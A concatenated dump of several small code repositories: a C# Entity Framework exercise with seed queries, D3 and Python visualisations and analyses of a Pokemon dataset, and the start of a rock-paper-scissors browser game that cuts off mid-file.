public DbSet<Teacher> teachers { get; set; }
public DbSet<Lecture> lect { get; set; }
public DbSet<Category> categ { get; set; }
}
}
<file_sep>using System.Collections.Generic;
using System.Linq;
using MyEntity.Entity;
using System;
namespace MyEntity.Query
{
public class TeacherQuery
{
private static ICollection<Lecture> lc;
public static void ShowTeacher()
{
lc = new List<Lecture>
{
new Lecture
{
Name = "Lecture 1",
Category=".Net",
Discriptions="OOP"
},
new Lecture
{
Name = "Lecture 2",
Category="JS",
Discriptions="HTML5"
},
new Lecture
{
Name = "Lecture 3",
Category="PHP",
Discriptions="HTML"
},
};
using (var db = new MyContext())
{
var tc = new List<Teacher>
{
new Teacher
{
Name = "<NAME>",
Lecture = lc
},
new Teacher
{
Name = "<NAME>",
Lecture = lc
},
new Teacher
{
Name = "<NAME>",
Lecture = lc
}
};
db.teachers.AddRange(tc);
db.SaveChanges();
Console.WriteLine("Rating teachers on the number of lectures");
var result = db.teachers.Select(item => new { Teacher = item.Name, LectureCount = item.Lecture.Count() });
foreach (var tst in result)
{
Console.WriteLine(tst);
}
}
}
}
}
<file_sep>using MyEntity.Entity;
using System;
using System.Linq;
using System.Collections.Generic;
namespace MyEntity.Query
{
public class UsersQuery
{
private static ICollection<DoTest> dts;
public static void ShowUsers()
{
using (var db = new MyContext())
{
var us = new List<Users>
{
new Users
{
Name = "Yaroslav",
Age = 26,
City = "Lviv",
University = "LDFA",
Category = ".Net",
DoTest = dts
},
new Users
{
Name = "Oleg",
Age = 23,
City = "Lviv",
University = "LP",
Category = ".Net",
DoTest = dts
},
new Users
{
Name = "Taras",
Age = 21,
City = "Kiev",
University = "KNP",
Category = "JS",
DoTest = dts
},
new Users
{
Name = "Igor",
Age = 22,
City = "Kiev",
University = "LP",
Category = "PHP",
DoTest = dts
},
new Users
{
Name = "Oleg",
Age = 23,
City = "Donetsk",
University = "DNI",
Category = "JS",
DoTest = dts
},
new Users
{
Name = "Dima",
Age = 21,
City = "Kiev",
University = "KPI",
Category = "DB",
DoTest = dts
},
};
db.user.AddRange(us);
db.SaveChanges();
Console.WriteLine("List of cities");
db.user.GroupBy(u => u.City).ToList().ForEach(user => Console.WriteLine(user.Key + " " + user.Count()));
}
}
}
}
<file_sep>using MyEntity.Entity;
using System.Collections.Generic;
using System.Linq;
using System;
namespace MyEntity.Query
{
public class TestsQuery
{
private static ICollection<Tests> tt;
public static void ShowTests()
{
tt = new List<Tests>
{
new Tests
{
Name = "for .Net students",
Category = ".Net",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 38
},
new Tests
{
Name = "for JS students",
Category = "JS",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 50
},
new Tests
{
Name = "for PHP students",
Category = "PHP",
TimeMax = 30,
ListAsk="What is a HTML?",
Pass = 25
},
new Tests
{
Name = "for DB students",
Category = "DB",
TimeMax = 25,
ListAsk="What is a DataBase?",
Pass = 20
},
};
using (var db = new MyContext())
{
var ak = new List<Ask>
{
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == "JS") }
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == ".Net") }
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a HTML?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == "PHP") }
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a DataBase?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == "DB") }
},
};
db.ask.AddRange(ak);
db.test.AddRange(tt);
db.SaveChanges();
Console.WriteLine("Popularity rating questions in tests");
var result = db.ask.Select(item => new { Ask = item.NameAsk, dfg = item.Tests.Count() });
foreach (var tst in result)
{
Console.WriteLine(tst);
}
Console.WriteLine("Average test by Category");
var r = from Tests in tt group Tests by new { Category = Tests.Category, Pass = Tests.Pass } into grouped select new { Category = grouped.Key.Category, Pass = grouped.Key.Pass, Average=grouped.Average(x=>x.Pass) };
foreach (var rt in r)
{
Console.WriteLine(rt);
}
}
}
}
}
<file_sep>using MyEntity.Entity;
using System;
using System.Collections.Generic;
using System.Linq;
namespace MyEntity.Query
{
public class DoTestQuery
{
private static Tests tt;
public static void ShowDoTest()
{
using (var db = new MyContext())
{
var users = db.user.Select(item => item).ToList();
var dts = new List<DoTest>
{
new DoTest
{
Name = ".Net",
UserID = users[0].UserID,
Result = 30,
Time = 25,
Tests = tt,
},
new DoTest
{
Name = "JS",
UserID = users[1].UserID,
Result = 12,
Time = 50,
Tests = tt,
},
new DoTest
{
Name = ".Net",
UserID = users[2].UserID,
Result = 22,
Time = 15,
Tests = tt,
},
new DoTest
{
Name = "DB",
UserID = users[3].UserID,
Result = 26,
Time = 15,
Tests = tt,
},
new DoTest
{
Name = "JS",
UserID = users[4].UserID,
Result = 25,
Time = 15,
Tests = tt,
}
};
db.testdo.AddRange(dts);
db.SaveChanges();
var some = db.testdo.Select(item => item).ToList();
Console.WriteLine("List of people who have passed the tests");
var listTest = (from DoTest in dts where DoTest.Result > 22 select DoTest.UserID);
foreach (var test in listTest)
{
Console.WriteLine(test);
}
Console.WriteLine("Members list passed tests and invested in time");
var listTest2 = (from DoTest in dts where DoTest.Result > 22 && DoTest.Time <= 20 select DoTest.UserID);
foreach (var test2 in listTest2)
{
Console.WriteLine(test2);
}
Console.WriteLine("Members list passed tests and is not invested in time");
var listTest3 = (from DoTest in dts where DoTest.Result > 22 && DoTest.Time >= 20 select DoTest.UserID);
foreach (var test3 in listTest3)
{
Console.WriteLine(test3);
}
Console.WriteLine("List of successful students by city");
var newResult = db.testdo.Where(item => item.Result > 22).GroupBy(s => s.Users.City, (key, g) => new { City = key, Count = g.Count() });
foreach (var test in newResult)
{
Console.WriteLine(test.City + ": " + test.Count);
}
Console.WriteLine("The result for each student");
var rrr = (from DoTest in dts where DoTest.Result > 0 && DoTest.Time > 0 select new { DoTest.Result,DoTest.Time, DoTest.UserID});
foreach (var rt in rrr)
{
Console.WriteLine(rt);
}
}
}
}
}
<file_sep>
using System.Collections.Generic;
namespace MyEntity.Entity
{
class Ask
{
public int AskID { get; set; }
public string Category { get; set; }
public string NameAsk { get; set; }
public ICollection<Tests> Tests { get; set; }
public Ask()
{
this.Tests = new List<Tests>();
}
}
}
|
7249ebade6565076e977887745346832d49d7a8d
|
[
"Markdown",
"C#"
] | 15 |
C#
|
Budzyn/BSA-ORM
|
9d04f1d2698ebbffe6298c261de8f51dbd56cbec
|
34fcb849e02a8332a69376c79f57ca9b8cb35c5a
|
refs/heads/master
|
<file_sep>var data = [];
var svg;
var headers = [
"Total",
"HP",
"Attack",
"Defense",
"SpAtk",
"SpDef",
"Speed",
"Legendary",
"Male",
"Female"
];
var margin = {top: 20, right: 20, bottom: 30, left: 60};
var width = 1000 - margin.left - margin.right;
var height = 700 - margin.top - margin.bottom;
window.onload = function () {
svg = d3.select("#content").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svg");
d3.csv("../Files/correlations.csv", function (csv) {
// Convert numerical values to numbers
csv.forEach(function(d) {
d.Total = +d.Total;
d.HP = +d.HP;
d.Attack = +d.Attack;
d.Defense = +d.Defense;
d.SpAtk = +d.SpAtk;
d.SpDef = +d.SpDef;
d.Speed = +d.Speed;
d.Legendary = +d.Legendary;
d.Male = +d.Male;
d.Female = +d.Female;
});
data = csv;
plot();
});
}
var plot = function() {
var x = d3.scaleBand().domain(headers).range([0, width], .1);
var xGrid = d3.scalePoint().domain(headers).range([0, width], .1);
var xAxis = d3.axisBottom().scale(x);
var xGridAxis = d3.axisBottom().scale(xGrid);
var y = d3.scaleBand().domain(headers).range([0, height], .1);
var yGrid = d3.scalePoint().domain(headers).range([0, height], .1);
var yAxis = d3.axisLeft().scale(y);
var yGridAxis = d3.axisLeft().scale(yGrid);
// add graph to canvas
var g = svg.append("g").attr("transform","translate(" + margin.left + "," + margin.top + ")");
//x-axis
g.append("g").attr("class", "xaxis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis);
/*
g.append("g").attr("class", "grid")
.attr("transform", "translate(0," + height + ")")
.call(xGridAxis.tickSize(-height,0,0).tickFormat(""));
*/
// y-axis
g.append("g")
.attr("class", "yaxis")
.call(yAxis);
/*
g.append("g")
.attr("class", "grid")
.call(yGridAxis.tickSize(-width, 0 , 0).tickFormat(""));
*/
var dataMatrix = [];
data.forEach(function (a, x) {
data.forEach(function(b, y) {
dataMatrix.push({a:a, b:b, x:x, y:y});
});
});
g.selectAll("g.corr")
.data(dataMatrix)
.enter()
.append("g")
.attr("transform", function (d) {
return "translate(" + (d.x * width/10) + "," + (d.y * height/10) + ")";
}).attr("class", "corr");
g.selectAll("g.corr").each(function (matrix, i) {
d3.select(this).append("rect").style("stroke", "#fff").attr("height", height/10)
.attr("width", width/10).style("fill", "white");
d3.select(this).append("rect").attr("height", height/10).attr("width", width/10)
.style("fill", function () {
var d = data[Math.floor(i/10)][headers[i%10]];
var value = Math.round(Math.abs(d)*255);
if(d>0) {
//return "rgb(" + value + ", 0, 0 )";
return "red";
}
else {
//return "rgb(0, 0, " + value + ")";
return "blue";
}
}).style("opacity", function() {
var d = data[Math.floor(i/10)][headers[i%10]];
return Math.abs(d);
});
});
$("<div></div>").attr("id", "grad").appendTo("#content");
$("<span></span>").text("-1").attr("class", "legend").appendTo("#grad");
$("<span></span>").text("1").attr("class", "legend").attr("style", "float: right").appendTo("#grad");
}<file_sep>var data = [];
var svg;
var svgScree;
var tooltip;
var types = [
"Normal",
"Fire",
"Fighting",
"Water",
"Grass",
"Flying",
"Poison",
"Electric",
"Ground",
"Psychic",
"Rock",
"Ice",
"Bug",
"Dragon",
"Ghost",
"Dark",
"Steel",
"Fairy"
];
var margin = {top: 20, right: 20, bottom: 30, left: 40};
var width = 1000 - margin.left - margin.right;
var height = 700 - margin.top - margin.bottom;
window.onload = function () {
svg = d3.select("#pcaplot").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svg");
svgScree = d3.select("#scree").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svg");
tooltip = d3.select("#pcaplot").append("div")
.attr("class", "tooltip").style("opacity", 0);
d3.csv("../Files/pca.csv", function (csv) {
// Convert numerical values to numbers
csv.forEach(function(d) {
d.PCA1 = +d.PCA1;
d.PCA2 = +d.PCA2;
});
data = csv;
plot("PCA1", "PCA2");
show();
});
}
plot = function (attr1, attr2) {
// functions to set up x
var xValue = function(d) {
return d[attr1];
};
var xScale = d3.scaleLinear().range([0, width]),
xMap = function(d) {
return xScale(xValue(d));
},
xAxis = d3.axisBottom().scale(xScale);
// functions to set up y
var yValue = function(d) {
return d[attr2];
}
var yScale = d3.scaleLinear().range([height, 0]),
yMap = function(d) {
return yScale(yValue(d));
},
yAxis = d3.axisLeft().scale(yScale);
// add graph to canvas
var g = svg.append("g").attr("transform","translate(" + margin.left + "," + margin.top + ")");
// Dots won't overlap axis with these buffers
xScale.domain([d3.min(data, xValue)-1, d3.max(data, xValue)+1]);
yScale.domain([d3.min(data, yValue)-1, d3.max(data, yValue)+1]);
//x-axis
g.append("g").attr("class", "xaxis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis)
.append("text")
.attr("class", "label")
.attr("x", width)
.attr("y", -6)
.style("text-anchor", "end")
.text(attr1);
// y-axis
g.append("g")
.attr("class", "yaxis")
.call(yAxis)
.append("text")
.attr("class", "label")
.attr("transform", "rotate(-90)")
.attr("y", 6)
.attr("dy", ".71em")
.style("text-anchor", "end")
.text(attr2);
// draw dots
g.selectAll(".dot")
.data(data)
.enter().append("circle")
.attr("class", function(d) {
return "dot " + d.Type1;
})
.attr("r", 3.5)
.attr("cx", xMap)
.attr("cy", yMap)
.on("mouseover", function(d) {
tooltip.transition()
.duration(200)
.style("opacity", .9);
tooltip.html(d.Name + "<br />" + attr1 + ": " + d[attr1] + "<br />" + attr2 +": " + d[attr2] )
.style("left", (d3.event.pageX + 5) + "px")
.style("top", (d3.event.pageY - 28) + "px");
})
.on("mouseout", function(d) {
tooltip.transition()
.duration(500)
.style("opacity", 0);
});
}
var getHeight = function(value) {
if (value > 10000) {
return value / 30;
}
else if (value > 1000) {
return value / 5;
}
else if (value > 100) {
return value / 5;
}
else if (value < 1) {
return value * 100;
}
else {
return value;
}
}
var show = function () {
d3.csv("../Files/eigenvalues.csv", function (data) {
var heightArray = [];
data.forEach(function(d) {
d.Value = parseFloat(d.Value);
heightArray.push(getHeight(d.Value));
});
var yValue = function(d) {
return d;
}
var yScale = d3.scaleLinear().range([height, 0]),
yMap = function(d) {
return yScale(yValue(d));
},
yAxis = d3.axisLeft().scale(yScale);
// add graph to canvas
var g = svgScree.append("g").attr("transform","translate(" + margin.left + "," + margin.top + ")");
yScale.domain([d3.min(heightArray, yValue)-1, d3.max(heightArray, yValue)+1]);
g.selectAll("rect").data(heightArray)
.enter()
.append("rect").attr("width", 45)
.attr("height", function (d) { return d; })
.attr("x", function (d, i) { return i*45 + 10*i + 7; })
.attr("class", "bar")
.attr("y", function (d) {
return svgScree.attr("height") - d - 50;
});
/*
g.selectAll("text")
.data(heightArray)
.enter()
.append("text")
.text(function(d, i) {
return data[i].Value;
})
.attr("x", function (d, i) { return i*45 + 10*i + 7 + 22; })
.attr("y", function (d, i) { return svgScree.attr("height") - d - 50 -3; })
.attr("text-anchor", "middle")
.attr("class", "tip");
*/
});
}
<file_sep>// Total -> SpAtk -> SpDef -> Defense -> Attack -> HP ->
// Legendary -> Female -> Speed -> Male
var data = [];
var svg;
var attributes = [
"Total",
"SpAtk",
"SpDef",
"Defense",
"Attack",
"HP",
"Legendary",
"Female",
"Speed",
"Male"
];
var types = [
"Normal",
"Fire",
"Fighting",
"Water",
"Grass",
"Flying",
"Poison",
"Electric",
"Ground",
"Psychic",
"Rock",
"Ice",
"Bug",
"Dragon",
"Ghost",
"Dark",
"Steel",
"Fairy"
];
var margin = {top: 40, right: 20, bottom: 30, left: 40};
var width = 1500 - margin.left - margin.right;
var height = 700 - margin.top - margin.bottom;
window.onload = function () {
$("<option />").val(null).text("None").appendTo("#filterSelect");
for (var i = 0; i < types.length; i++) {
$("<option />").val(types[i]).text(types[i]).appendTo("#filterSelect");
}
$("#filterSelect").change(function (){
filterTypes($(this).val());
});
svg = d3.select("#content").append("svg")
.attr("width", 1500).attr("height", 700) .attr("id", "svg")
.append("g")
.attr("transform", "translate(" + margin.left + "," + margin.top + ")");
d3.csv("../Files/Pokemon.csv", function (csv) {
// Convert numerical values to numbers
csv.forEach(function(d) {
d.Total = +d.Total;
d.HP = +d.HP;
d.Attack = +d.Attack;
d.Defense = +d.Defense;
d.SpAtk = +d.SpAtk;
d.SpDef = +d.SpDef;
d.Speed = +d.Speed;
d.Generation = +d.Generation;
d.Male = +d.Male;
d.Female = +d.Female;
d.Index = +d.Index;
d.Pnum = +d.Pnum;
});
data = csv;
plot();
});
}
var line = d3.line();
var dragging = {};
var x = d3.scalePoint().range([0, width], 1);
var y = {};
var plot = function() {
var axis = d3.axisLeft();
var foreground;
// Get list of dimensions and scale for each
x.domain(dimensions = d3.keys(data[0]).filter(function(d) {
return attributes.includes(d) && (y[d] = d3.scaleLinear()
.domain(d3.extent(data, function(p) {
return +p[d];
}))
.range([height, 0]));
}));
foreground = svg.append("g")
.attr("class", "foreground")
.selectAll("path")
.data(data)
.enter().append("path")
.attr("class", function(d) {
return d.Type1 + " " + d.Type2;
})
.attr("d", path);
// Add a group element for each dimension.
var g = svg.selectAll(".dimension")
.data(dimensions)
.enter().append("g")
.attr("class", "dimension")
.attr("transform", function(d) { return "translate(" + x(d) + ")"; });
// Add an axis and title.
g.append("g")
.attr("class", "axis")
.each(function(d) { d3.select(this).call(axis.scale(y[d])); })
.append("text")
.style("text-anchor", "middle")
.attr("y", -9)
.text(function(d) { return d; });
}
function position(d) {
var v = dragging[d];
return v == null ? x(d) : v;
}
function transition(g) {
return g.transition().duration(500);
}
// Returns the path for a given data point.
function path(d) {
return line(dimensions.map(function(p) { return [position(p), y[p](d[p])]; }));
}
function filterTypes(type) {
if (!type) {
for (var i = 0; i < types.length; i++) {
$("." + types[i]).attr("style", "opacity: 1; stroke-width: 1px;");
}
return;
}
for (var i = 0; i < types.length; i++) {
if (type != types[i])
$("." + types[i]).attr("style", "opacity: .1; stroke-width: 1px;");
}
$("." + type).attr("style", "opacity: 1; stroke-width: 3px;")
}<file_sep>import numpy as np
import pandas as pd
from sklearn import manifold
from sklearn.decomposition import PCA
from sklearn.metrics.pairwise import euclidean_distances
input_file = "Pokemon.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 7, 1)
X = numpy_array
pca = PCA(n_components=2)
pca.fit(X)
Xco = np.dot(X, pca.components_[0])
Yco = np.dot(X, pca.components_[1])
pcaPlotCo = np.column_stack((Xco, Yco))
euc = euclidean_distances(pcaPlotCo)
mds = manifold.MDS(n_components=2, dissimilarity='precomputed')
pos = mds.fit(euc)
np.savetxt("mds.csv", pos.embedding_, delimiter=",")
print(pos.embedding_)<file_sep>var csv = [];
var svg;
var svgType;
var svgGen;
var types = [
"Normal",
"Fire",
"Fighting",
"Water",
"Grass",
"Flying",
"Poison",
"Electric",
"Ground",
"Psychic",
"Rock",
"Ice",
"Bug",
"Dragon",
"Ghost",
"Dark",
"Steel",
"Fairy"
];
var gens = [
1, 2, 3, 4, 5, 6
];
window.onload = function () {
$("#attrForm").change(function () {
$(this).val($("input[name='attr']:checked").val());
$("#attrTitle").text($("input[name='attr']:checked").val());
show();
});
$("#binForm").change(function () {
$(this).val($("input[name='bin']:checked").val());
$("#binTitle").text($("input[name='bin']:checked").val());
show();
});
svgType = d3.select("#content").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svgType")
.on("click", nextAttr);
svgGen = d3.select("#content").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svgGen")
.on("click", nextAttr);
$("svg").hide();
d3.csv("../Files/Pokemon.csv", function (data) {
csv = data;
// Default doing Bin: Type and Attr: Attack
$("input[value='Type']").prop('checked', true);
$("input[value='Attack']").click();
$(".filter").fadeIn(1000);
});
}
var getAvgType = function (type, attr) {
var total = 0;
var count = 0;
for (var i = 0; i < csv.length; i++) {
var pokemon = csv[i];
if (pokemon.Type1 != type && pokemon.Type2 != type)
continue;
if (attr == "Male" || attr == "Female") {
total += parseFloat(pokemon[attr]);
}
else {
total += parseInt(pokemon[attr]);
}
count++;
}
return total/count;
};
var getAvgGen = function (gen, attr) {
var total = 0;
var count = 0;
for (var i = 0; i < csv.length; i++) {
var pokemon = csv[i];
if (pokemon.Generation != gen)
continue;
if (attr == "Male" || attr == "Female") {
total += parseFloat(pokemon[attr]);
}
else {
total += parseInt(pokemon[attr]);
}
count++;
}
return total/count;
}
var getHeight = function (key, attr) {
if (isType()) {
var height = getAvgType(key, attr);
}
else if (isGen()) {
var height = getAvgGen(key, attr);
}
if (attr != "Total") {
height *= 5;
}
if (attr == "Male" || attr == "Female") {
height *= 200;
height = Math.round(height);
}
return height;
}
var isType = function () {
return $("input[value='Type']").is(':checked');
}
var isGen = function () {
return $("input[value='Generation']").is(':checked');
}
var getAttr = function () {
return $("#attrForm").val();
}
var show = function () {
var attr = $("#attrForm").val();
var heightArray = [];
if (isType()) {
$("#svgGen").hide();
$("#svgType").fadeIn();
svg = svgType;
for(var i = 0; i < types.length; i++) {
var height = getHeight(types[i], attr);
heightArray.push(height);
}
showType(heightArray);
}
else if (isGen()) {
$("#svgType").hide();
$("#svgGen").fadeIn();
svg = svgGen;
for(var i = 0; i < gens.length; i++) {
var height = getHeight(gens[i], attr);
heightArray.push(height)
}
showGen(heightArray);
}
}
var showType = function(heightArray) {
var bar = $(".Normal");
if (!bar.length) {
svg.selectAll("rect").data(heightArray)
.enter()
.append("rect").attr("width", 45)
.attr("height", function (d) { return d; })
.attr("x", function (d, i) { return i*45 + 10*i + 7; })
.attr("class", function(d, i) { return "bar " + types[i] })
.attr("y", function (d, i) { return svg.attr("height") - d; })
.on("mouseover", zoomBar)
.on("mouseout", shrinkBar);
svg.selectAll("text")
.data(heightArray)
.enter()
.append("text")
.text(getTip)
.attr("x", function (d, i) { return i*45 + 10*i + 7 + 22; })
.attr("y", function (d, i) { return svg.attr("height") - d - 3; })
.attr("text-anchor", "middle").style("opacity", 0)
.attr("class", function(d, i) { return "tip " + types[i]});
}
else {
svg.selectAll("rect").data(heightArray)
.transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d; })
.attr("height", function(d) {return d;});
svg.selectAll("text").data(heightArray).transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d - 3})
.text(getTip);
}
}
var showGen =function(heightArray) {
var bar = $(".gen1");
if (!bar.length) {
svg.selectAll("rect").data(heightArray)
.enter()
.append("rect").attr("width", 157)
.attr("height", function (d) { return d; })
.attr("x", function (d, i) { return i*157 + 10*i + 5; })
.attr("class", function(d, i) { return "bar gen" + gens[i] })
.attr("y", function (d, i) { return svg.attr("height") - d; })
.on("mouseover", zoomBar)
.on("mouseout", shrinkBar);
svg.selectAll("text")
.data(heightArray)
.enter()
.append("text")
.text(getTip)
.attr("x", function (d, i) { return i*157 + 10*i + 7 + 76; })
.attr("y", function (d, i) { return svg.attr("height") - d - 3; })
.attr("text-anchor", "middle").style("opacity", 0)
.attr("class", function(d, i) { return "tip gen" + gens[i]});
}
else {
svg.selectAll("rect").data(heightArray)
.transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d; })
.attr("height", function(d) {return d;});
svg.selectAll("text").data(heightArray).transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d - 3})
.text(getTip);
}
}
var getTip = function(d, i) {
var label = ((isType()) ? types[i] : "Gen " + gens[i]) + " ";
if (getAttr() == "Total")
return label + Math.round(d);
else if (getAttr() == "Male" || getAttr() == "Female")
return label + Math.round(d) / 1000;
else
return label + Math.round(d) / 5;
}
var nextAttr = function() {
var next = $("input[name='attr']:checked").next();
if (!next.length) {
$("input[value='Attack']").click();
return
}
next.click();
}
var orig = {};
var zooming = false;
var zoomBar = function(d, i) {
if (zooming) return;
zooming = true;
var select;
if (isType()) {
select = "text." + types[i];
}
else if (isGen()) {
select = "text.gen" + gens[i];
}
orig.TipY = d3.select(select).attr("y");
d3.select(select).transition().duration(300)
.style("opacity", 100).attr("y", function() {
return parseInt(d3.select(this).attr("y") - 100);
});
var bar = d3.select(this);
orig.X = parseInt(bar.attr("x"));
orig.Y = parseInt(bar.attr("y"));
orig.W = parseInt(bar.attr("width"));
orig.H = parseInt(bar.attr("height"));
bar.transition().duration(300).attr("x", orig.X - 5)
.attr("width", orig.W + 10)
.attr("height", orig.H + 100).attr("y", bar.attr("y") - 100);
}
var shrinkBar = function (d, i) {
if (isType()) {
d3.select("text." + types[i]).transition().duration(300)
.style("opacity", 0).attr("y", function() { return orig.TipY;});
}
else if (isGen()) {
d3.select("text.gen" + gens[i]).transition().duration(300)
.style("opacity", 0).attr("y", function() { return orig.TipY;});
}
var bar = d3.select(this);
bar.transition().duration(300).attr("x", orig.X).attr("width", orig.W)
.attr("height", orig.H).attr("y", orig.Y);
zooming = false;
}<file_sep>import numpy as np
import pandas as pd
from sklearn import manifold
from sklearn.decomposition import PCA
from sklearn.metrics.pairwise import euclidean_distances
input_file = "correlations.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
X = numpy_array
for y in np.nditer(X, op_flags=['readwrite']):
y[...] = 1 - abs(y)
(X.transpose() == X).all()
mds = manifold.MDS(n_components=2, dissimilarity='precomputed')
pos = mds.fit(X)
np.savetxt("mdscor.csv", pos.embedding_, delimiter=",")
print(pos.embedding_)<file_sep>import numpy as np
import pandas as pd
input_file = "Pokemon.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
numpy_array = np.rot90(numpy_array, 1)
numpy_array = np.delete(numpy_array, 0, 0)
numpy_array = np.delete(numpy_array, 1, 0)
numpy_array = np.delete(numpy_array, 9, 0)
b = np.corrcoef(numpy_array.astype(float))
print(numpy_array)
#numpy.savetxt("correlation.csv", b, delimiter=",")<file_sep>import numpy as np
import pandas as pd
input_file = "Pokemon.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 7, 1)
X = numpy_array
#Get PCA Coordinates
pca = PCA()
pca.fit(X)
Xco = np.dot(X, pca.components_[0])
Yco = np.dot(X, pca.components_[1])
pcaPlotCo = np.column_stack((Xco, Yco))
# np.savetxt("pca.csv", pcaPlotCo, delimiter=",")
#Get Data for scree plot
eig = pca.explained_variance_
np.savetxt("eigenvalues.csv", eig, delimiter=",")
print(eig)
|
f42d908c5faba46ea540f9090a7336f2e0db0999
|
[
"JavaScript",
"Python"
] | 8 |
JavaScript
|
brancuad/Pokemon
|
da58c5f1046648bd7442e71ee78a5c3b20780676
|
87f3dae57079881fc9848a4a6c370ebd1cbeb9f9
|
refs/heads/master
|
<file_sep>import React, { useState, FormEvent, ChangeEvent } from 'react'
export interface IUseFormOptions {
initialState?: { [key: string]: any }
onSuccessSubmit: (inputs: { [key: string]: any }) => void
validate: (inputs: { [key: string]: any }) => { [key: string]: any }
}
export default function useForm(opts: IUseFormOptions) {
const { validate } = opts
const [ inputs, setInputs ] = useState(opts.initialState || {})
const [ errors, setErrors ] = useState<any>({})
const [ submitted, setSubmitted ] = useState(false)
const [ pristine, setPristine ] = useState(true)
function dispatchInputs(values: any) {
const newInputs = { ...inputs, ...values }
setInputs(newInputs)
if (pristine) {
setPristine(false)
}
if (submitted) {
setErrors(validate(newInputs))
}
}
return {
dispatchInputs,
errors,
inputs,
pristine,
submitted,
onSubmit(event: FormEvent<HTMLFormElement>) {
event.preventDefault()
setSubmitted(true)
const newErrors = validate(inputs)
setErrors(newErrors)
if (Object.keys(newErrors).length === 0) {
setPristine(true)
opts.onSuccessSubmit(inputs)
}
},
onChange(event: ChangeEvent<HTMLTextAreaElement | HTMLInputElement>) {
dispatchInputs({ [event.target.name]: event.target.value })
},
onChangeRadio(event: React.ChangeEvent<{}>, value: string) {
const target = event.target as HTMLInputElement
dispatchInputs({ [target.name]: value })
},
}
}
<file_sep>React Hook Example: `useForm`
---
This is a demonstration about building your own [React Hook](https://reactjs.org/docs/hooks-intro.html), written in TypeScript.
Some notes about the demostrated `useForm` hook:
* There are 3 exposed handlers for handling value changes, where `onChange` fits in common use cases for `input` and `dispatchInputs` is slightly low leveled.
* `pristine` refers to whether the form is touched. It's the antonym of `dirty`. This is convenient for building "Do you want to save before leaving?" confirmation feature.
### License
WTFPL
|
a47abe27b3983d60f421c6ccccb844d33fc94860
|
[
"Markdown",
"TypeScript"
] | 2 |
TypeScript
|
teaualune/react-hook-useform-ts
|
e1de3d48212185a4ca3c1953d50b0296261c8877
|
f36fadd294e70a6768485b0ff436bbe12953474d
|
refs/heads/master
|
<repo_name>gettimer/rockpaperscissors<file_sep>/README.md
# rockpaperscissors
Rock paper and scissors game
### Installation
```
npm install
```
### Start Dev Server
```
npm run start
```
### Build Prod Version
```
npm run dev
```
<file_sep>/src/index.js
import './styles/scss/main.scss';
const options = ['rock','paper','scissors']; //selections
const endTotal = 3; //game finishes when any opponents reaches
const resultDiv = document.getElementById('results'); //layer that we print result
let currentOpt, currentOpp, wins = 0, fails = 0; //users choise, computer choise, total wins and fails of user
//creating circle buttons
const addButton = (option) => {
let newOption = document.createElement('li');
let newText = document.createTextNode(option);
newOption.appendChild(newText);
newOption.id = option;
document.getElementById('options').appendChild(newOption);
newOption.onclick = () => {
clearClasses();
if(option !== 'restart') {
//creating rock paper and scissors button click
selectAndBump(option);
}
else {
//creating restart button click
document.getElementById('options').classList.remove('end');
newOption.remove();
printResult(``,'draw');
wins = 0;
fails = 0;
printScore();
}
}
}
//adding rock paper and scissors buttons to dom from options array
const createSelections = () => {
options.forEach(function (option, index) {
addButton(option);
});
}
const selectAndBump = (option) => {
currentOpp = options[Math.floor(Math.random() * options.length)]; //computers selection random from array
currentOpt = option; //users selection
if(currentOpp === currentOpt) {
draw(option);
}
else {
//if computers and users selection is not same operating game rules
if(currentOpt === 'rock') {
if(currentOpp === 'scissors') {
win(); //rock eats scissors
}
else {
fail(); //paper eats rock
}
}
else if(currentOpt === 'paper') {
if(currentOpp === 'rock') {
win(); //paper eats rock
}
else {
fail(); //scissors eats paper
}
}
else if(currentOpt === 'scissors') {
if(currentOpp === 'paper') {
win(); //scissors eats paper
}
else {
fail(); //rock eats scissors
}
}
}
}
const draw = (option) => {
printResult(`DRAW! Both you and computer selected ${currentOpt}`,'draw'); //printing draw message
}
const win = () => {
wins = wins + 1; //increasing users win count
printScore(); //printing score
document.getElementById(currentOpt).classList.add('win'); //highlighting winner option
if(wins === endTotal) {
//reached win limit
printResult(`YOU WIN!`,'win');
document.getElementById('options').classList.add('end');
gameOver();
}
else {
//printing win message
printResult(`YOU WİN! You selected ${currentOpt} and computer selected ${currentOpp}`,'win');
}
}
const fail = () => {
fails = fails + 1; //increasing users fail count
printScore();//printing score
document.getElementById(currentOpp).classList.add('fail'); //highlighting computer's winner option
if(fails === endTotal) {
//reached fail limit
printResult(`YOU FAIL!`,'fail');
gameOver();
}
else {
//printing fail message
